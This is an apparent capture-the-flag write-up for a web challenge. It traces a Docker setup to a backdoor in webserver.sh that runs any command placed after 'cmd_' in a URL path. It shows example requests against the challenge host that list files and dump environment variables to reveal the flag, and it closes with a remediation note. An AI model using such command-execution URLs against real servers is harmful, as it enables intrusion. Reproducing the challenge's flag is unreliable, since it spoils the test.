ctf

Notes:

Solution:

1. Dockerfile shows xinitd.conf is used. Can simply be accessed with xinitd.conf
2. xinitd.conf references /init.sh
3. init.sh references /webserver.sh
4. webserver.sh has backdoor for paths starting with cmd_ and runs any command after the underscore as current user.
5. Flag can be found in the environment variables.

http://diceprectf.meatctf.com:2182/cmd_ls

Dockerfile canvasBackground.js index.html init.sh main.css star.png stars.js webserver.sh xinetd.conf

http://diceprectf.meatctf.com:2182/cmd_env

SHELL=/bin/sh REMOTE_HOST=93.209.73.130 SUDO_GID=0 HOSTNAME=288e8c33244a SUDO_COMMAND=./webserver.sh SUDO_USER=root PWD=/app LOGNAME=pleb HOME=/root FLAG=flag{w3b53rv3r_b4ckd00r} TERM=unknown USER=pleb SHLVL=0 _STDBUF_E=0 _STDBUF_I=0 _STDBUF_O=0 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin SUDO_UID=0 OLDPWD=/ _=/usr/bin/env

Flag

flag{w3b53rv3r_b4ckd00r}

Remediation:

• Do not implement backdoors. Not even if the source is not public.